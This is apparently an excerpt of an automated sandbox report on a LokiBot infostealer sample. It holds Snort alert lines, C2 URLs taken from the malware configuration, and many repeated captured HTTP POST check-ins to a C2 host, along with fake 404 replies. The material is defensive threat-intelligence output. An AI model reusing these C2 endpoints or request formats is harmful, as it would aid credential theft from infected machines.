Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49896 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49896 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49896 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49896 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49896 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49897 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49897 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49897 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49897 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49897 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49898 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49898 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49898 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49898 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49898 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49785
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.96.3:80 -> 192.168.2.3:49788
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49797
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49798
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.96.3:80 -> 192.168.2.3:49885

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EcIokiggUeWK7stOcHYaTR9Nfu%2Bw1B0KmIgjz5XBrLi5RlXYADH7OvXr%2FdJTFK4ComS7WX9Kl%2BawzsVO2xC9i7YvxqK%2B2HlQKPAZKDJzBamMX%2Fg9bDYXNFLl8qJ2TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4da52d366927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjmr%2BbPvZ8rJwWgffZI2qiEiavpl6O22f%2BcT7CB7tnbyuPOA357Zf2FNxPVWIvbMb8Ndmpi8h9MOOPpjYMpVs8g7ts%2B3HNgz92kV0CK9kX0Lqi1trxOEgmN37zwvtA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dadc8f29a21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7ABObsXbQcHdnhtJPI8XreO6Qwq10iYwVNciyewQ4rLsb7Pcx09BNdkyXLXs9ydJd52ebLqkg3Ye7uOK2DeXYCKDW1duAcls9jdV3KDrYwI1Ddm7lqJGDb603ptNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4db41affbbf7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgEHyzNGG3wTlvIqrFT9Qg9CyoJJco9av7NNGpAxa4Lv150iQghRp9kjVuXQ7MMVm025fTNlO4GAiU0JtozkA90G4dr6yvHcKVA0lMkDoG%2BgwlguHut59hkTKxPVSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dbb0f449bbc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WSuTK3xmdvnC9SqK9C3Kq8XKsdf7rSOiPJ%2B%2B9ZxDB06tiwdevw3TNAATZmNMvGVEVg9KMwbf3%2BoFJ2siKx%2BGf5kYUXLsWwINIX3uVE6oCo9rZDzlcazlVHOgpMj%2Bzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dc31d919156-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IusO3PS%2BNxKdc1pE1bhnckIxsL5IUfCMg2N0ixhg1CJ8YDJ1sexeannt%2BdOuWAWENyuH9TYSsv6kia7W5E0PwtJhXkXW0Vn8XxMvKbR1Rut7thDprsdBL3x8jct0aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dc9eb03bb55-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
